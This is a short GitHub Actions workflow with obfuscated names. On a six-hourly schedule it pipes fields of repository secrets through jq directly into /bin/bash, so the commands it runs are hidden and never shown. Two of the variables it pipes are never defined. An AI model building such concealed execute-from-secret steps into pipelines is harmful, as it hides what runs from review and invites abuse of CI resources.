name: hejintui9348

on:
  workflow_dispatch:
  schedule:
    - cron: '25 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hejintui9348
        env:
          monx820: ${{ secrets.monx820 }}
        run: |
          echo $monx820 | jq -r .d2 | /bin/bash
          echo $be92 | jq -r .sdr2806 | /bin/bash
          echo $ccrjl403 | jq -r .w2 | /bin/bash

